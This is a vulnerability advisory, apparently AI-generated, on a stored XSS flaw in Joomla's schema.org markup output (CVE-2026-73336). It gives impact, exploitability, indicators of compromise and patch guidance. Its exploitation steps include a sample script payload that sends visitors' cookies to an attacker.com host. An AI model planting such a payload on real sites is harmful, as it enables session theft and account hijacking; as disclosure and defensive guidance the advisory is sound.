CVE-2026-73336
Joomla vulnerability analysis and mitigation

Overview

CVE-2026-73336 is a Cross-Site Scripting (XSS) vulnerability in Joomla! CMS core, identified as security advisory [20260806], affecting versions 5.1.0–5.4.7 and 6.0.0–6.1.2. The flaw stems from improper escaping of flags in schema.org structured data markup outputs, enabling injection of malicious scripts. It was published on August 18, 2026, with a patch made available the same day. The vulnerability carries a CVSS v4.0 base score of 5.1 (Medium) (GitHub Advisory, Joomla Security Centre).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically arising from insufficient output escaping when rendering schema.org structured data markup in Joomla's core (GitHub Advisory). An attacker with high privileges (e.g., an administrator or editor-level account) can inject arbitrary JavaScript into schema.org markup fields, which is then rendered unsanitized in page output and executed in the browsers of site visitors. The attack vector is network-based, requires no user interaction from the attacker, and has low attack complexity, though it does require elevated privileges to inject the malicious content (Joomla Security Centre).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users visiting affected Joomla pages, enabling session cookie theft, account hijacking, page content defacement, and actions performed on behalf of victims without their knowledge. The confidentiality and integrity of the vulnerable system are both assessed as low-impact, with no availability impact and no impact on subsequent systems (GitHub Advisory). While the scope is limited to the vulnerable system, session hijacking could facilitate privilege escalation or further compromise of the Joomla backend.

Exploitability

As of the disclosure date, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation (Joomla Security Centre). The EPSS score is 0.0, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires high privileges, which further limits the attack surface compared to unauthenticated XSS vulnerabilities.

Exploitation steps

  1. Gain Privileged Access: Obtain a high-privilege account (e.g., administrator or content editor) on a Joomla instance running versions 5.1.0–5.4.7 or 6.0.0–6.1.2, either through credential theft, phishing, or brute force.
  2. Locate Schema.org Markup Fields: Navigate to the Joomla backend and identify content areas or configuration options that render schema.org structured data markup in page output.
  3. Inject Malicious Payload: Insert a crafted JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a schema.org-related field, exploiting the improper output escaping.
  4. Trigger Victim Execution: When a site visitor loads the affected page, the injected script executes in their browser, enabling session cookie theft, account hijacking, or other client-side attacks (Joomla Security Centre, GitHub Advisory).

Indicators of compromise

  • Logs: Joomla administrator access logs showing unusual modifications to schema.org-related content fields or structured data configurations by unexpected user accounts.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after loading Joomla pages, potentially carrying session tokens or cookie data in query parameters.
  • File System: Unexpected changes to Joomla template or content files containing <script> tags or encoded JavaScript within schema.org markup blocks.
  • Process/Application: Joomla audit logs recording edits to structured data or metadata fields by accounts not typically associated with content management.

Mitigation and workarounds

Joomla has released patched versions addressing this vulnerability: upgrade to Joomla 5.4.8 or later (for the 5.x branch) or 6.1.3 or later (for the 6.x branch) (Joomla Security Centre). As an additional layer of defense, administrators should implement Content Security Policy (CSP) HTTP headers to restrict script execution sources. Custom schema.org implementations should be reviewed and validated to ensure proper output escaping is applied. Restricting high-privilege account access and enabling multi-factor authentication can reduce the risk of exploitation via compromised credentials.

Additional resources


SourceThis report was generated using AI

Related Joomla vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-71573MEDIUM6.9
  • Joomla logoJoomla
  • cpe:2.3:a:joomla:joomla\!
NoNoAug 18, 2026
CVE-2026-73372MEDIUM5.1
  • Joomla logoJoomla
  • cpe:2.3:a:joomla:joomla\!
NoNoAug 18, 2026
CVE-2026-73336MEDIUM5.1
  • Joomla logoJoomla
  • cpe:2.3:a:joomla:joomla\!
NoNoAug 18, 2026
CVE-2026-72531MEDIUM5.1
  • Joomla logoJoomla
  • cpe:2.3:a:joomla:joomla\!
NoNoAug 18, 2026
CVE-2026-71572MEDIUM4.8
  • Joomla logoJoomla
  • cpe:2.3:a:joomla:joomla\!
NoNoAug 18, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management